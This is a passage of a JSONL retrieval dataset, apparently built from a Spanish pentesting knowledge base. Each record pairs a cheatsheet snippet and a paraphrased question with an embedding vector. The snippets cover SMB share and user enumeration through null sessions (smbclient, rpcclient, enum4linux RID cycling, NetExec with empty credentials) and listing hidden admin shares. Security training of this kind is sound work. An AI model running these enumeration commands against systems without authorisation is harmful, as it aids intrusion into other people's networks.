0.03119, -0.03414, 0.04895, -0.03768, -0.0408, -0.06551, -0.00207, 0.01477, -0.03345, 0.01659, 0.04582, -0.01126, -0.02334, 0.04098, -0.07957]} +{"tipo": "pregunta", "herramienta": "Operadores Bash", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores Bash.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## grep ΓΊtiles\n```\ngrep -v invertir (excluir) grep -i ignorar mayus/minus\ngrep -r recursivo grep -l solo nombre del fichero\ngrep -c contar coincidencias\n```\n\n- `< /dev/null` evita que un comando se cuelgue pidiendo `Password:` (clave en bucles).\n\nRelacionado: Operadores PowerShell Β· Bucles bash sobre IPs Β· OSCP MOC", "indexar": "cual es una forma de contar cuantas veces aparece algo sin que se cuelgue pidiendo contraseΓ±a?", "v": [0.05712, 0.26424, -0.08623, 0.08512, -0.02218, -0.16858, -0.02335, -0.09472, -0.02065, -0.16496, 0.02635, -0.00612, -0.01966, -0.09029, 0.05318, -0.04831, 0.11325, 0.11889, 0.13132, 0.02736, 0.0288, -0.021, 0.00806, -0.06154, -0.10493, -0.06167, 0.11736, 0.04367, -0.05192, -0.05404, 0.03846, -0.03738, 0.00707, -0.07194, 0.00214, 0.14656, 0.0077, 0.1112, -0.04739, 0.06636, -0.03511, 0.07278, -0.14767, 0.15047, -0.0518, 0.03052, -0.0373, 0.13035, 0.06066, 0.01647, -0.12861, -0.00679, -0.02947, 0.00368, 0.00427, -0.06749, 0.19923, -0.0457, 0.03925, -0.01225, -0.06157, -0.02899, 0.07834, -0.00801, -0.02802, -0.06403, 0.00754, 0.03064, -0.01847, -0.00321, -0.03507, 0.00451, -0.18537, -0.08212, 0.01531, -0.00078, 0.05568, -0.11612, 0.01769, 0.0415, -0.0122, 0.03774, -0.01518, 0.01547, -0.09882, -0.03762, 0.01665, -0.044, 0.10235, -0.08008, 0.04891, 0.0152, -0.04023, 0.08034, -0.0053, 0.01651, -0.01639, 0.04334, -0.10402, -0.00216, 0.01851, 0.02117, -0.07308, 0.04657, -0.06413, -0.0042, 0.00959, -0.10144, 0.04542, -0.07229, 0.06276, -0.00787, -0.02493, -0.05067, 0.00123, -0.06741, -0.05113, -0.09253, -0.00185, -0.02431, -0.04533, -0.06248, 0.02997, 0.03367, 0.03435, 0.02674, -0.06317, 0.04231, 0.0253, -0.07198, 0.04013, -0.01714, -0.01516, -0.03465, -0.04006, 0.00088, -0.03458, -0.04247, -0.0697, 0.01847, 0.05887, 0.05331, 0.05295, -0.12209, 0.02237, 0.08288, 0.0514, 0.02251, -0.17445, 0.04646, -0.01826, 0.08613, 0.10199, 0.05237, -0.03613, 0.07008, 0.01029, -0.07129, -0.05365, 0.03647, -0.01686, 0.01038, -0.03627, 0.0301, -0.07065, -0.07611, -0.07747, -0.03093, 0.08373, -0.04911, 0.01633, 0.05092, -0.08263, -0.05454, 0.0142, -0.0272, -0.01464, -0.05901, -0.02144, -0.05023, -0.02803, 0.02613, -0.05288, 0.04252, 0.0208, -0.05951, 0.04665, 0.05391, -0.0059, 0.01171, 0.05144, 0.01348, -0.0209, 0.0263, -0.02822, -0.04271, -0.01949, -0.01317, 0.03052, -0.09075, -0.03931, -0.01854, -0.02475, -0.038, 0.03693, 0.03194, -0.09561, -0.01888, -0.04562, -0.0008, 0.1103, -0.03822, 0.0405, -0.08473, -0.00017, -0.08644, -0.00055, -0.01997, -0.0232, -0.01447, 0.07296, 0.05297, 0.09669, 0.02575, 0.01223, -0.01185, -0.03529, 0.05915, -0.00292, 0.07646, -0.07183, 0.06499, -0.04316, 0.00279, 0.0706, 0.02211, -0.01988, -0.10164, -0.05817, -0.09368, 0.04246, 0.03804, -0.0213, -0.0678, -0.04543, -0.01332, -0.07383, 0.0404, 0.01218, -0.0233, -0.01917, 0.03901, 0.02225, -0.01629, 0.07385, -0.04811]} +{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Listar shares y usuarios\n```bash\nsmbclient -L //IP/ -N # shares con sesiΓ³n nula (OJO: trunca comentarios)\nsmbclient //IP/share -N # entrar (ls, get, !cat)\nsmbclient -L //IP/ -U usuario # con credenciales\nrpcclient -U \"\" -N IP -c \"netshareenumall\" # shares + remark COMPLETO (no trunca)\nrpcclient -U \"\" -N IP -c \"enumdomusers\" # usuarios de dominio (SAM)\nenum4linux -a IP # TODO (pilla users UNIX locales por RID cycling)\nnxc smb IP -u '' -p '' --shares --users # NetExec (sucesor de CrackMapExec)\n```", "indexar": "que programa sirve para listar los shares y usuarios de un servidor SMB?", "v": [0.06456, -0.03727, -0.12486, -0.2192, -0.05773, -0.2457, -0.09629, -0.24642, 0.06366, -0.02001, -0.08719, -0.07582, 0.15923, -0.18604, 0.0043, 0.03915, 0.10278, -0.12924, 0.03358, 0.0765, 0.13853, 0.12261, 0.02631, -0.06776, -0.11569, 0.06164, 0.01538, -0.10607, -0.03056, 0.05317, -0.03566, -0.10975, 0.00634, -0.06576, 0.06366, -0.05674, 0.00551, 0.02779, -0.03195, 0.08686, 0.0962, 0.03538, -0.03441, -0.08444, -0.01754, 0.02432, 0.01853, -0.00974, 0.0857, -0.02066, -0.0591, 0.02995, -0.07449, 0.05632, -0.06547, -0.02361, -0.01586, -0.19912, -0.01552, -0.02646, -0.15625, 0.02157, 0.01767, -0.08653, 0.02948, -0.03867, 0.03605, 0.03689, -0.10798, -0.01177, -0.07856, 0.08089, 0.04846, -0.10989, 0.00938, 0.07706, 0.01053, -0.04133, 0.00332, -0.00889, 0.00542, -0.03374, 0.00495, 0.09249, -0.06155, -0.05744, 0.0421, -0.03879, 0.04037, 0.00558, 0.05702, 0.11304, -0.00367, 0.10464, 0.0224, -0.03663, 0.18043, -0.00508, 0.04016, 0.01085, 0.12947, 0.04804, -0.07251, 0.07772, -0.0243, 0.13131, 0.08741, -0.05137, -0.00221, 0.03294, 0.06906, -0.00729, -0.02857, -0.00852, -0.06748, -0.06776, -0.04188, -0.03223, 0.0082, 0.0077, -0.08184, -0.01203, 0.01011, -0.02549, 0.04834, -0.01013, 0.05705, 0.07898, -0.05636, -0.00238, -0.03616, 0.03528, -0.03299, -0.0066, -0.07829, -0.04488, 0.05028, -0.02866, -0.04643, -0.01343, 0.02811, 0.08138, -0.04305, 0.01774, 0.06917, -0.02789, 0.07907, -0.0864, -0.05662, 0.01105, 0.04614, -0.02351, -0.09524, -0.00884, -0.06267, -0.02117, 0.01129, -0.08324, -0.07829, 0.05415, -0.02675, 0.00463, 0.01292, 0.04153, 0.01689, -0.01528, 0.00553, 0.04516, 0.08578, 0.05431, -0.00195, 0.10238, 0.04829, -0.07675, 0.01033, -0.01809, -0.02171, -0.02128, 0.01571, 0.03378, -0.06489, -0.01964, 0.04296, 0.04299, -0.05296, -0.07202, -0.06819, 0.01837, 0.00675, 0.00374, -0.04987, 0.02197, -0.0362, 0.03536, 0.02603, -0.05368, -0.01417, -0.00116, -0.00215, -0.03886, -0.05035, 0.00729, -0.06477, -0.01536, 0.02131, 0.02404, 0.01486, 0.00976, 0.07587, 0.03076, 0.00396, -0.00405, 0.06475, 0.00287, -0.02905, -0.05485, 0.06946, 0.01024, 0.07004, -0.02079, -0.02645, 0.00599, -0.00526, 0.04056, -0.00798, -0.00102, -0.00926, -0.02818, 0.04946, -0.00114, -0.03978, -0.00067, 0.00927, 0.00199, 0.01561, -0.03281, -0.02445, 0.00724, -0.00389, -0.06624, -0.08486, 0.05522, -0.01865, -0.06137, -0.00939, -0.01808, -0.02057, -0.04006, -0.01836, 0.00154, -0.01862, -0.03988, 0.05123, -0.01485, 0.02073, 0.01546]} +{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Listar shares y usuarios\n```bash\nsmbclient -L //IP/ -N # shares con sesiΓ³n nula (OJO: trunca comentarios)\nsmbclient //IP/share -N # entrar (ls, get, !cat)\nsmbclient -L //IP/ -U usuario # con credenciales\nrpcclient -U \"\" -N IP -c \"netshareenumall\" # shares + remark COMPLETO (no trunca)\nrpcclient -U \"\" -N IP -c \"enumdomusers\" # usuarios de dominio (SAM)\nenum4linux -a IP # TODO (pilla users UNIX locales por RID cycling)\nnxc smb IP -u '' -p '' --shares --users # NetExec (sucesor de CrackMapExec)\n```", "indexar": "con quΓ© puedo obtener la lista completa de usuarios de dominio sin truncar comentarios?", "v": [-0.1448, 0.05685, -0.08699, -0.02067, -0.02876, -0.07473, 0.04288, 0.00417, -0.14767, 0.01348, -0.07322, -0.18491, 0.07696, -0.1777, 0.00423, -0.08325, 0.13748, -0.02909, 0.11643, -0.02919, 0.01069, -0.12961, -0.08737, -0.09632, -0.04294, -0.107, -0.05421, -0.1637, -0.0251, 0.09193, 0.16302, -0.07648, 0.0129, 0.01583, -0.01748, -0.00519, 0.09882, 0.14826, 0.05876, 0.13706, 0.01272, -0.017, -0.1032, 0.06212, -0.12874, -0.05174, -0.04557, 0.00858, -0.00079, -0.11864, -0.01213, -0.02709, -0.11724, -0.04311, -0.01443, -0.10047, 0.09215, -0.11414, 0.04846, -0.03604, -0.06747, 0.00283, -0.01729, 0.09904, -0.07431, -0.05417, 0.07428, 0.02808, -0.01097, 0.09148, 0.11278, 0.02284, 0.04331, -0.03629, 0.10637, 0.01606, 0.0412, 0.00056, 0.01817, 0.01655, 0.07875, 0.00454, -0.00899, -0.0425, -0.06792, -0.09623, -0.06384, -0.09734, 0.06942, 0.0269, 0.1115, 0.1048, -0.06591, 0.00096, -0.00514, 0.0035, 0.10513, 0.04132, -0.02275, -0.0579, 0.10093, 0.14354, -0.10703, 0.08245, 0.07276, 0.06724, 0.02411, -0.11595, -0.01027, -0.05815, 0.01261, -0.06643, -0.1112, -0.01189, -0.03573, 0.06296, -0.1649, -0.06853, -0.03733, -0.05261, -0.11663, 0.01413, 0.03171, -0.07815, 0.09082, 0.02088, 0.05982, 0.03779, -0.04997, -0.10398, -0.01227, 0.01007, -0.01481, -0.07812, 0.01006, -0.01406, 0.02359, 0.03767, -0.02075, 0.03607, 0.01261, -0.00137, -0.12975, -0.03998, -0.01591, -0.11376, 0.03276, -0.11325, -0.03505, -0.08064, -0.08131, 0.05665, 0.01865, 0.04854, 0.0315, 0.05509, -0.00744, -0.02175, 0.03559, -0.01655, -0.03226, -0.01132, -0.03478, 0.04378, 0.00697, -0.01734, 0.03011, 0.00391, 0.03007, 0.03565, 0.0031, 0.08133, 0.02182, -0.02978, 0.00551, -0.00415, -0.00117, 0.01334, -0.04474, 0.00473, -0.0462, -0.04911, -0.05135, 0.03304, -0.00395, 0.03758, 0.02053, -0.01751, -0.02415, 0.05082, -0.03534, 0.02869, -0.02199, 0.08759, 0.04674, 0.00636, 0.01265, 0.0391, -0.01612, -0.06674, -0.03556, -0.04614, 0.01728, 0.01463, -0.00672, -0.03985, -0.00598, 0.00297, 0.06096, 0.00153, 0.05147, -0.00902, 0.02588, -0.02288, -0.01735, -0.01272, 0.01143, -0.00335, -0.00726, -0.05783, -0.0577, 0.06589, -0.02601, 0.03074, 0.01991, 0.07409, -0.0264, -0.01506, 0.05508, 0.05222, -0.05615, -5e-05, -0.01814, -0.02044, 0.01778, -0.03373, 0.02148, 0.00832, 0.00771, 0.01695, -0.06219, 0.06058, 0.04175, -0.0261, -0.06839, -0.07912, -0.05485, -0.00188, -0.01071, -0.03707, -0.00253, 0.02058, 0.02898, -0.00931, 0.027, 0.04077]} +{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Listar shares y usuarios\n```bash\nsmbclient -L //IP/ -N # shares con sesiΓ³n nula (OJO: trunca comentarios)\nsmbclient //IP/share -N # entrar (ls, get, !cat)\nsmbclient -L //IP/ -U usuario # con credenciales\nrpcclient -U \"\" -N IP -c \"netshareenumall\" # shares + remark COMPLETO (no trunca)\nrpcclient -U \"\" -N IP -c \"enumdomusers\" # usuarios de dominio (SAM)\nenum4linux -a IP # TODO (pilla users UNIX locales por RID cycling)\nnxc smb IP -u '' -p '' --shares --users # NetExec (sucesor de CrackMapExec)\n```", "indexar": "quΓ© herramienta alternativa a CrackMapExec usa para enumerar shares y usuarios en redes SMB?", "v": [-0.14659, -0.10497, -0.06702, -0.25703, -0.00302, -0.1112, -0.17226, -0.04491, -0.01798, -0.04884, -0.18503, -0.1646, 0.07597, -0.12939, 0.10973, 0.09115, -0.03386, -0.03284, 0.11424, -0.05011, 0.01662, 0.0237, -0.13515, -0.01647, -0.0854, 0.06032, -0.09578, -0.02949, -0.08375, 0.09266, 0.00359, 0.03561, 0.02785, -0.0302, -0.08218, -0.0387, 0.13319, -0.02116, 0.0923, 0.01655, -0.01172, 0.0184, -0.17422, -0.073, 0.04716, 0.03993, -0.11052, -0.02524, -0.05021, -0.01945, -0.08661, -0.07254, -0.26349, 0.01439, -0.07104, -0.06188, 0.11038, -0.12208, -0.01779, -0.04255, -0.04926, 0.04254, 0.00136, 0.0507, -0.00379, -0.04603, -0.00865, 0.03123, -0.12124, 0.11195, 0.0098, 0.10457, 0.08783, -0.10945, -0.00277, 0.04223, 0.02485, -0.03254, 0.02061, 0.04667, 0.01488, -0.06929, -0.04437, 0.0032, -0.06087, 0.02331, 0.10362, -0.04351, 0.00157, -0.02549, -0.00941, 0.01117, -0.02594, 0.07841, 0.0286, -0.06265, 0.03207, -0.03683, -0.01648, -0.03267, 0.09475, -0.00189, -0.1304, 0.07504, -0.02295, 0.00511, -0.05094, 0.02026, -0.10068, 0.0313, 0.12694, 0.10533, -0.00596, 0.04689, 0.01114, -0.02802, -0.07595, -0.00745, -0.0425, -0.02269, -0.02152, 0.01559, -0.04667, -0.1112, 0.02528, 0.07257, -0.07665, 0.10233, 0.02196, -0.10082, -0.0052, -0.04408, -0.02814, -0.05461, -0.07375, -0.01712, 0.0085, -0.08389, -0.01814, -0.04362, -0.073, 0.02569, -0.07752, -0.08147, 0.01142, 0.0352, 0.00235, -0.04113, -0.04498, -0.00617, 0.01927, 0.01721, -0.06762, 0.02839, 0.01957, 0.06293, -0.05863, -0.01374, -0.09827, 0.01801, -0.01226, -0.06605, -0.00961, 0.0289, -0.05513, 0.00757, 0.03437, 0.02418, 0.01892, 0.02579, -0.01623, 0.14909, 0.06224, -0.04287, -0.0001, -0.05554, -0.01405, 0.0163, 0.00841, -0.01206, -0.0139, -0.0848, 0.04747, 0.0508, -0.01825, -0.05562, 0.02833, 0.02133, -0.00915, -0.01285, -0.08386, 0.04451, 0.05815, -0.02856, 0.02983, -0.03721, 0.05376, -0.02451, -0.00363, 0.00649, -0.04165, -0.01219, -0.02644, -0.0308, 0.03299, 0.03048, 0.04712, -0.02633, 0.04125, 0.0222, 0.01323, 0.00188, -0.00019, -0.00786, 0.00673, -0.01334, 0.04195, 0.04556, -0.01174, -0.03743, -0.03229, 0.01155, -0.01244, 0.02842, -0.02575, 0.05996, -0.0605, -0.01954, -0.02745, -0.01398, 0.06563, -0.04707, 0.02055, 0.05397, 0.02295, -0.07028, -0.02583, 0.00523, 0.00905, -0.00223, -0.05358, -0.01416, -0.00517, 0.04908, -0.0467, -0.01642, -0.00636, -0.05236, -0.0473, -0.04254, -0.00717, -0.02951, 0.05446, -0.00852, -0.00692, -0.00068]} +{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Desde Windows\n```cmd\nnet view \\\\dc01 /all :: shares incl. ocultos. Admin shares: ADMIN$, C$, IPC$\n```", "indexar": "ΒΏQuΓ© comando sirve para ver todos los recursos compartidos en otra computadora desde Windows?", "v": [0.07797, 0.08916, -0.01254, -0.13867, 0.04365, -0.20168, 0.10908, -0.06781, -0.0101, -0.16269, -0.07729, -0.10837, -0.00033, -0.06386, -0.00241, 0.02835, 0.1033, 0.01515, 0.08398, -0.06379, 0.06189, -0.07198, 0.05562, 0.00472, -0.02728, -0.01939, 0.10475, -0.06107, -0.12565, -0.05907, 0.04713, 0.02193, 0.10213, -0.0474, -0.02334, 0.06136, 0.00165, 0.04541, 0.01699, 0.07635, 0.01854, 0.13126, -0.12354, 0.0238, 0.1338, -0.04996, 0.00308, -0.06742, 0.05158, 0.00114, -0.12412, -0.01264, -0.08603, -0.05683, -0.0073, -0.07563, 0.1294, -0.07717, 0.05377, -0.02605, -0.10761, 0.0321, -0.04532, 0.01882, -0.09018, 0.01863, -0.04552, -0.06002, -0.05754, 0.10796, -0.15025, 0.09719, 0.05025, -0.07167, 0.03948, 0.03515, -0.04324, -0.03534, 0.17617, -0.05604, 0.02665, 0.06451, -0.07312, -0.0505, -0.05871, -0.16394, 0.03447, -0.04076, 0.03214, -0.0711, 0.01239, -0.017, -0.05567, 0.05598, 0.0892, 0.01999, 0.09777, 0.0566, 0.00053, 0.09921, 0.07466, -0.08359, -0.07446, 0.1305, -0.02196, 0.13459, 0.04246, -0.09205, -0.06286, -0.03669, 0.08992, -0.00451, -0.03386, 0.04334, -0.07309, -0.01099, 0.01649, -0.05219, -0.01835, 0.00775, -0.12817, 0.06669, -0.00442, 0.07605, 0.00977, -0.04873, 0.01374, 0.0943, -0.00592, 0.0055, -0.01735, -0.04431, 0.01431, -0.09174, -0.09409, 0.0564, 0.01213, -0.06083, -0.02472, -0.10432, 0.08124, 0.11868, 0.02086, -0.03385, -0.00471, 0.06278, 0.14886, -0.02853, -0.06575, -0.04617, 0.0593, 0.01287, -0.06267, -0.00655, -0.02424, 0.07709, 0.03649, 0.08313, -0.08951, -0.015, -0.0795, 0.01365, 0.00777, 0.0044, 0.00867, -0.02957, -0.05468, 0.01022, 0.03741, 0.03926, -0.06357, 0.05214, -0.0154, -0.01815, -0.03036, -0.04291, 0.02155, -0.02059, -0.02594, -0.00749, -0.06156, 0.04555, -0.0391, 0.00301, -0.039, -0.00028, -0.06104, 0.02657, -0.0446, -0.02189, -0.02539, -0.02387, 0.00836, -0.05473, 0.04838, -0.05367, -0.06215, -0.02711, 0.06983, -0.00291, -0.08382, 0.0382, -0.06599, -0.02615, 0.06665, 0.06319, -0.02597, 0.01317, 0.02298, 0.07874, -0.03826, 0.00094, 0.01947, -0.01411, -0.08453, -0.05967, 0.06285, -0.00724, -0.03324, -0.03265, 0.04644, -0.00589, 0.04069, -0.03471, 0.08895, -0.01102, -0.05206, 0.00335, 0.03726, -0.0177, -0.01717, 0.0233, 0.03646, -0.00221, 0.0043, 0.01136, -0.00122, -0.01942, -0.02751, 0.00913, -0.05328, 0.04237, -0.04943, -0.1168, -0.06502, -0.02231, -0.0618, 0.00402, -0.05021, -0.06176, -0.00168, -0.06882, 0.00167, -0.02197, -0.05912, 0.04787]} +{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Desde Windows\n```cmd\nnet view \\\\dc01 /all :: shares incl. ocultos. Admin shares: ADMIN$, C$, IPC$\n```", "indexar": "ΒΏCon quΓ© puedo listar las carpetas ocultas y archivos de administrador que comparto con otros?", "v": [0.22502, 0.03946, -0.03721, -0.05206, -0.02638, -0.11877, 0.15734, 0.07482, -0.19704, -0.03021, -0.08754, -0.13434, -0.02677, 0.09057, 0.08164, 0.01415, 0.1729, -0.04489, 0.0318, -0.02586, 0.05657, -0.00105, 0.05484, -0.01395, -0.11777, -0.03617, 0.15614, 0.06499, -0.08391, -0.01678, -0.06309, 0.11924, 0.02971, 0.00559, 0.00111, 0.06851, -0.05344, 0.03128, -0.08123, 0.00012, 0.09836, 0.10268, -0.05592, 0.04784, -0.0199, -0.04574, -0.08851, -0.01223, 0.04023, -0.00809, -0.13562, -0.13553, -0.06308, -0.02935, 0.03361, -0.10742, 0.00848, -0.00038, 0.15282, 0.0045, -0.01996, 0.07338, -0.02201, 0.0884, -0.10087, -0.04518, -0.0112, -0.05168, -0.06419, 0.11926, -0.05193, 0.0864, 0.05268, 0.02506, 0.0228, 0.09779, -0.01463, -0.05781, -0.03914, 0.04741, -0.02981, 0.01578, -0.04598, 0.06127, -0.05017, -0.13986, -0.07654, -0.01146, -0.10941, -0.08646, 0.02817, -0.0675, -0.06822, -0.02013, 0.05486, -0.02249, 0.0954, 0.05909, -0.04931, 0.00446, -0.04499, 0.01996, -0.07828, 0.14227, -0.05273, 0.15601, -0.03244, -0.03436, 0.01338, -0.09136, 0.06042, 0.02825, -0.03169, 0.03696, -0.02353, -0.01725, -0.05654, -0.00811, -0.0597, -0.00876, -0.04568, 0.00523, 0.0309, 0.07381, 0.13497, -0.0323, 0.04695, 0.16095, -0.05017, 0.06137, -0.07823, 0.01326, -0.06022, -0.03781, -0.10514, 0.05934, -0.04499, 0.01428, 0.07289, 0.00645, 0.05988, 0.02808, 0.0484, -0.00342, 0.09231, -0.02061, -0.00384, -0.078, -0.04772, -0.02169, 0.03146, 0.01759, 0.05903, 0.01676, -0.00519, 0.04761, 0.08532, -0.11046, -0.00074, -0.00429, -0.04564, -0.03403, -0.07095, 0.0111, -0.00486, -0.02656, -0.03769, -0.02406, 0.03129, 0.0038, 0.01997, 0.07152, -0.04765, -0.0569, -0.02774, -0.00283, 0.05194, -0.07087, 0.03175, -0.00942, -0.02205, 0.03852, -0.00638, 0.04343, -0.0218, -0.01212, 0.04241, -0.00365, -0.03686, 0.06655, 0.06924, 0.04837, 0.00195, 0.01771, -0.06286, -0.06876, 0.02114, 0.00899, -0.00907, -0.03725, -0.04715, -0.0185, -0.02323, -0.0238, 0.05051, -0.00281, -0.07858, 0.07183, -0.01747, 0.03735, 0.05991, 0.00887, 0.1244, -0.06463, -0.01095, -0.00736, -0.00424, 0.01249, 0.02535, -0.06068, 0.0627, 0.05575, 0.06745, -0.0451, 0.08355, 0.03461, -0.0146, 0.0231, 0.05129, 0.02403, -0.02105, 0.02948, -0.02836, -0.02352, 0.04135, 0.02248, -0.00296, -0.06948, -0.01984, 0.01856, 0.00827, 0.06405, 0.01772, -0.05176, -0.06201, -0.05182, -0.06072, 0.08481, -0.00424, -0.09477, -0.00539, 0.03211, 0.00582, -0.02568, 0.03705, -0.05592]} +{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Desde Windows\n```cmd\nnet view \\\\dc01 /all :: shares incl. ocultos. Admin shares: ADMIN$, C$, IPC$\n```", "indexar": "ΒΏCΓ³mo tengo que ejecutar un comando para inspeccionar las shares incluidas y aquellas ocultas desde el escritorio?", "v": [0.06467, 0.10249, -0.0843, -0.03695, 0.0811, -0.13795, 0.0328, -0.10756, -0.03674, -0.09396, -0.14688, -0.00405, 0.05021, -0.10057, 0.03718, 0.06002, 0.16224, -0.07101, -0.00309, -0.01903, 0.06234, -0.01775, -0.01328, -0.02769, -0.06905, 0.00091, 0.04675, -0.06011, -0.11882, -0.08955, -0.03227, 0.04653, 0.07266, -0.04579, 0.02537, 0.0267, -0.05517, -0.11811, -0.07272, 0.13913, 0.01619, 0.10197, -0.13808, 0.00127, 0.02843, 0.00133, -0.01287, 0.08924, 0.04639, -0.04007, -0.04666, -0.01278, -0.08773, -0.01159, -0.05421, -0.05103, 0.13636, -0.0079, 0.08212, -0.00496, 0.0034, 0.01598, 0.05283, 0.093, -0.04805, -0.07406, -0.0842, -0.07825, -0.04994, 0.09484, -0.16546, 0.0445, 0.00673, 0.06808, 0.11245, -0.02372, -0.03793, -0.02741, 0.06507, 0.07128, -0.04072, 0.01698, -0.10009, 0.12283, -0.09494, -0.11036, -0.06234, -0.04953, -0.10708, -0.03983, 0.03932, -0.0901, -0.07391, 0.02889, -0.01129, 0.00837, 0.08553, 0.01725, -0.01759, -0.02081, 0.10768, -0.09903, -0.10025, 0.14105, 0.00902, 0.1613, -0.08946, -0.0178, -0.00377, 0.02961, 0.00972, 0.04546, -0.02464, -0.09742, 0.0022, -0.04544, 0.00926, -0.06788, -0.0029, -0.076, -0.15192, 0.01239, -0.01151, 0.05872, 0.03563, -0.14023, -0.03842, 0.07016, 0.0482, 0.05088, -0.14306, -0.00993, 0.00595, -0.10178, -0.09755, 0.13816, -0.05812, -0.04608, -0.09275, -0.09201, 0.09194, 0.07163, -0.00448, -0.02511, 0.07559, 0.00436, 0.06262, -0.04657, -0.04572, 0.03762, 0.02267, 0.01935, 0.01502, 0.0191, 0.03231, 0.01918, 0.0295, -0.03716, 0.04891, 0.06676, 0.00078, 0.01714, -0.08103, -0.006, 0.01867, -0.03244, -0.08218, -0.06132, -0.04444, 0.00796, -0.04864, 0.02342, -0.01479, -0.03197, 0.00725, -0.09493, -0.00209, -0.05067, 0.07185, 0.04662, -0.0012, 0.06134, -0.00276, -0.00747, 0.02274, 0.00149, 0.04355, -0.03042, -0.02098, 0.05562, 0.02145, -0.02503, -0.02883, -0.06151, -0.00273, -0.01752, -0.02845, 0.01095, -0.00726, -0.07257, -0.07763, 0.02128, -0.02554, -0.06618, 0.02491, -0.05711, -0.06062, 0.1037, -0.04927, 0.01701, 0.0538, 0.02041, 0.11594, -0.01334, -0.03855, -0.01254, 0.02646, 0.02582, -0.00181, -0.02174, 0.02299, 0.03623, 0.08283, -0.03148, 0.04309, -0.01331, -0.05192, 0.02617, 0.05597, 0.04923, -0.01168, 0.04355, -0.00863, 0.04398, 0.01141, 0.01882, 0.02506, 0.0389, -0.01892, -0.00647, -0.00916, 0.06149, 0.00605, -0.07631, -0.05384, -0.06402, -0.09689, 0.03618, -0.03316, -0.04257, -0.00455, 0.02241, 0.05856, -0.05462, -0.0075, -0.09063]} +{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas\n- `smbclient -L` **trunca** comentarios β†’ usa `rpcclient netshareenumall` para el `remark` completo.\n- Usuarios UNIX locales (`S-1-22-1`) solo los pilla `enum4linux -a` (RID cycling), **no** `enumdomusers`.\n- Automatiza la red entera con Bucles bash sobre IPs.", "indexar": "que herramienta sirve para listar todos los compartimientos de red incluyendo sus comentarios completos?", "v": [0.05681, 0.16734, -0.17783, -0.07653, 0.11365, -0.17394, 0.02658, -0.09731, -0.05838, -0.13824, -0.0902, -0.10017, 0.03623, -0.10982, 0.20499, 0.08308, 0.0879, -0.10049, -0.02713, -0.05571, 0.0298, 0.00483, -0.12118, -0.06601, -0.02967, -0.05994, 0.08315, -0.13638, -0.08341, 0.06255, 0.08471, 0.02515, -0.03054, -0.07265, -0.04426, -0.04253, -0.00981, 0.035, -0.12228, 0.03147, -0.01299, 0.08391, -0.16296, -0.00266, -0.02396, -0.0287, -0.05425, 0.07251, -0.00483, 0.04282, -0.05488, -0.03662, -0.16044, -0.04411, -0.02706, -0.10908, 0.12579, -0.0679, -0.02759, 0.00045, 0.00901, 0.09055, -0.04336, -0.00981, -0.01406, -0.07853, -0.05401, -0.02229, -0.05188, 0.12764, -0.08942, 0.0892, 0.02932, -0.07818, -0.04203, 0.04936, -0.01722, 0.09322, 0.04629, 0.03864, 0.04407, -0.08518, -0.00552, -0.00298, 0.01956, -0.11013, 0.07313, -0.07774, 0.01993, -0.04955, 0.05905, 0.03128, -0.04538, -0.00444, 0.02818, 0.06413, 0.10224, 0.05174, 0.02291, 0.03669, 0.17524, 0.00837, -0.05389, -0.04576, -0.0278, 0.08966, 0.01601, -0.03019, 0.05186, -0.06348, 0.08105, 0.00458, 0.01235, -0.04583, -0.01978, -0.00592, -0.08901, -0.08674, -0.0431, -0.04608, -0.01967, 0.08199, -0.04441, -0.01271, 0.04109, -0.0294, -0.09169, 0.07611, 0.02821, -0.02523, -0.06554, 0.02727, -0.05361, -0.02266, -0.02464, -0.02581, -0.01348, -0.04273, -0.01622, -0.07321, 0.04384, 0.07163, 0.00438, -0.10995, 0.04152, 0.06344, 0.03924, -0.06638, -0.00071, 0.02767, 0.01461, 0.05387, -0.02428, 0.00202, -0.00377, 0.0721, 0.05159, -0.01804, -0.06043, 0.0637, -0.05593, -0.03867, 0.0212, 0.00271, 0.04385, -0.02371, 0.02884, -0.03395, 0.0775, 0.04308, 0.073, 0.06747, -0.02785, -0.02716, -0.0698, -0.049, -0.04702, -0.03051, 0.02722, -0.04967, -0.03588, 0.02725, -0.09653, -0.0189, -0.03918, -0.04449, -0.00345, -0.04196, 0.01188, 0.00023, -0.03474, -0.00066, -0.01789, -0.02488, 0.00482, -0.0333, -0.06511, -0.05572, 0.06335, -0.05771, -0.10199, -0.00673, -0.02701, -0.02448, 0.00338, 0.07743, -0.02297, 0.03906, -0.04469, 0.07005, 0.05329, -0.02919, 0.08988, -0.03806, -0.05252, -0.0764, 0.08297, 0.0021, 0.04964, 0.03525, 0.06245, 0.03591, 0.04161, -0.01854, 0.03561, 0.0501, 0.04464, -0.00593, 0.03569, 0.04071, 0.01242, 0.01378, -0.03838, -0.04856, 0.0097, -0.02048, 0.07224, 0.00173, -0.08394, -0.03168, 0.00327, 0.02722, -0.04363, -0.04228, -0.0661, -0.0709, 0.0019, 0.00936, 0.02523, -0.13636, -0.03273, 0.05629, 0.08402, -0.07827, 0.07087, -0.0414]} +{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas\n- 